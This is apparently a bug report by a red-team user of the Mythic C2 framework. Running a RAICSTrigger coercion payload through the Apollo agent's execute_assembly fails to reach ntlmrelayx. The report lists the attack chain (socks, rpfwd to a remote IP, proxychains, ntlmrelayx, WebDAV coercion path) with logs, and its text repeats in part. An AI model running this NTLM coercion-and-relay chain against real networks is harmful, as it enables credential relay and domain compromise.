Hey,
I tried to use RAICSTrigger .net Payload from https://github.com/klezVirus/RAIWhateverTrigger with apollo's execute_assembly function, but I never see a connection to ntlmrelayx. (works with the same .exe in sliver on same target host)
Versions:
Target: Windows 10
Mythic: v3.4.6 UI: v0.3.78
Apollo: 2.3.51
Steps to reproduce:
- Compile .net payload from https://github.com/klezVirus/RAIWhateverTrigger/tree/master/RAICSTrigger
- Deploy apollo agent (debug) as standard domain user
- register_assembly
- socks -Action start -Port 7001
- rpfwd -Port 80 -RemoteIP 10.x.xxx.xx -RemotePort 80 -DebugLevel "Connections"
- Setup proxychains and ntlmrelayx (and verify it is working with nc)
- execute_assembly -Assembly RAICSTrigger.exe -Arguments \127.0.0.1@80\test\test.jpg
Logs:
rpfwd:
Starting server on port 80 where Apollo is running.
Updating Sleep to 0
Started listening on port: 80
[Connection 764198830] - New Connection
Client: 127.0.0.1:51139
[Connection 764198830] - Data (141 Bytes) From Remote Connection
OPTIONS /test/test.jpg HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
translate: f
Host: 127.0.0.1
execute_assembly:
[+] Triggering CreateFileW against: \\127.0.0.1@80\test\test.jpg
[+] NdrClientCall3 returned
[>] Return Pointer: 0x32
apollo debug:
.\apollo_debug.exe
KerberosTicketManager initialized
Initializing process output pipes
Running InitializeProcessOutputPipes as: xx\user
Initialized process output pipes: True
Creating environment block
Got safe startup args
Initializing proc thread attribute list
Setting parent process
Running pre handle duplication as: xx\user
Running get process handle as: xx\user
Running duplicate handles as: xx\user
Duplicating handles
Duplicated StdOut handle normal: True
Duplicated StdErr handle normal: True
Setting up startup info
adding data to output
Got a new connection: 764198830
added new connection to RpfwdManager _connections: 764198830
Got data from client: 764198830, AddRpfwdDatagramToQueue
accepting more connections
got rpfwd datagram to go to mythic: 764198830
got rpfwd datagram to go to mythic: 764198830
routing datagram: 764198830
routing datagram: 764198830
adding data to output
adding data to output
closing pipe in OnAsyncMessageReceived with 0 bytesRead
disconnecting on named pipe
OnDisconnect
no longer collecting output
Sacrificial process exited with code 0x103
Any hints for further debugging? I tried the BOF too, same result. I tried using something like SharpHTTP to make the connection against 127.0.0.1:80 and this is working fine and the connections gets to ntlmrelayx.
Thanks and greets
hag
Hey,
I tried to use RAICSTrigger .net Payload from https://github.com/klezVirus/RAIWhateverTrigger with apollo's execute_assembly function, but I never see a connection to ntlmrelayx. (works with the same .exe in sliver on same target host)
Versions:
Target: Windows 10
Mythic: v3.4.6 UI: v0.3.78
Apollo: 2.3.51
Steps to reproduce:
Logs:
rpfwd:
execute_assembly:
apollo debug:
Any hints for further debugging? I tried the BOF too, same result. I tried using something like SharpHTTP to make the connection against 127.0.0.1:80 and this is working fine and the connections gets to ntlmrelayx.
Thanks and greets
hag